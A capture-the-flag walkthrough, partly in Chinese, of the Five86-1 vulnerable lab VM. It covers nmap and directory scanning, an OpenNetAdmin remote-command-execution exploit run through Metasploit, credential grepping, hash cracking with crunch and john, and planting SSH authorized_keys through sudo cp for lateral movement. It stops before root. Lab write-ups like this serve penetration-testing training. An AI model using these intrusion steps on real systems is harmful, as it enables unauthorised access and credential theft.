Five86-1

2020-02-14 14 —— 2020-02-14 16

Description
Five86-1 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

Technical Information
Five86-1 is a VirtualBox VM built on Debian 64 bit, but there shouldn't be any issues running it on most PCs.

Five86-1 has been tested successfully on VMWare Player, but if there are any issues running this VM in VMware, have a read through of this.

It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.

Installation is simple - download it, unzip it, and then import it into VirtualBox or VMWare and away you go.

Important
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.

In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.

Credits
A big thanks goes out to the members of @m0tl3ycr3w.

Contact
I'm also very interested in hearing how people go about solving these challenges, so if you're up for writing a walkthrough, please do so and send me a link, or alternatively, follow me on Twitter, and DM me (you can unfollow after you've DM'd me if you'd prefer).

I can be contacted via Twitter - @Five86_x

1 2	Kali : 192.168.56.109 目标网段 : 192.168.56.1/24

信息收集

主机存活：

1	$ nmap -s -sn -T5 -v 192.168.56.1/24 \| grep -B 1 "Host is up"

扫服务：

1	$ nmap -n -Pn -sV -O 192.168.56.114

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.38 ((Debian))
10000/tcp open  http    MiniServ 1.920 (Webmin httpd)

访问 80 端口，无有价值信息

例行扫目录：

1	dirsearch.py -u http://192.168.56.114 -e php --random-agents

经访问：

########################
[14:35:21] 200 -   30B  - /index.html    # 404
[14:35:25] 401 -  461B  - /reports          # need user|passwd
[14:35:25] 401 -  461B  - /reports/Webalizer/   # need user|passwd
[14:35:25] 200 -   29B  - /robots.txt
#####
http://192.168.56.114/robots.txt
User-agent: *
Disallow: /ona
########################
http://192.168.56.114/ona	# OpenNetAdmin

搜索相关漏洞，得到远程命令执行：

1	searchsploit opennetadmin

海滩登陆

使用 47691.sh 如果报错的话，可以先 dos2unix 转换一下格式，作者可能在 dos 环境下写的脚本

使用 MSF：

# 先复制到桌面
cp /usr/share/exploitdb/exploits/php/webapps/47772.rb ~/Desktop/

# 复制到 MSF 内利用
cp 47772.rb /usr/share/metasploit-framework/modules/exploits/

测试发现存在 Python 使用交互式 shell

1
2
3

> shell

python -c "import pty;pty.spawn('/bin/bash')"

先看 /etc/passwd 有多少用户及有价值信息。目录全无访问权

这个时就需要最后的搜刮一下，得到了一组用户密码。其他用户，无有价值信息：

1	grep -ri --color=auto --exclude-dir=proc/ 'douglas' / 2>/dev/null

Hash 破解，没跑成来，查了一下，会用到作者给的提示 aefhrt。使用 crunch 生产字典：

1	john --wordlist=/usr/share/wordlists/rockyou.txt hash

$ crunch 10 10 aefhrt >word.txt

# or
$ crunch 10 10 aefhrt -o word.txt

$ john --wordlist=word.txt hash 
$ john --show hash 

?:fatherrrrr

身份切换(SSH免密登陆)

可使用的 sudo 命令为 cp ：

涉及知识的盲区了，特地去查询记录了一下

cp 命令可以配合 SSH（authorized_keys） 免密登录到其他用户：

# 为目标生成 ssh key
ssh-keygen -b 2048

# 复制生成的 id_rsa.pub 到 /tmp 下并改名为 authorized_kes
cp /home/douglas/.ssh/id_rsa.pub /tmp/authorized_kes

# 改变 authorized_kes 的权限
chmod 777 authorized_keys

# 复制到目标 .ssh/ 下
sudo -u jen /bin/cp authorized_keys /home/jen/.ssh/

# 登陆
ssh jen@127.0.0.1